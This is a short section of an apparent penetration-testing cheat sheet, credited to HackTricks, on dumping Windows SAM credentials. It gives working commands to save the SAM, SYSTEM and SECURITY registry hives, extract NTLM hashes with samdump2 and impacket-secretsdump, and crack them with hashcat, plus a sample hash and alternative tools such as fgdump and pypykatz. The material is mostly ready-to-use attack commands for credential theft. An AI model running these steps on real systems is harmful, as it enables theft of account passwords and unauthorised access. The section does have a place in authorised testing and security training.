10. Dumping SAM

The easiest way to steal the Security Account Manager (SAM) files is to get a copy from the registry:

reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security

Download those files to your Kali machine and extract the hashes using:

samdump2 SYSTEM SAM
impacket-secretsdump -sam sam -security security -system system LOCAL

Results in hashes like this:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f518eb35353d7a83d27e7fe457664e5:::

• The string starting with "8f518" is the NTLM hash which can be cracked using hashcat -m 1000

Alternatives:

.\secretsdump_windows.exe -sam C:\windows\system32\config\SAM -system C:\windows\system32\config\SYSTEM LOCAL

fgdump

pypykatz

Credit: https://book.hacktricks.xyz/windows-hardening/stealing-credentials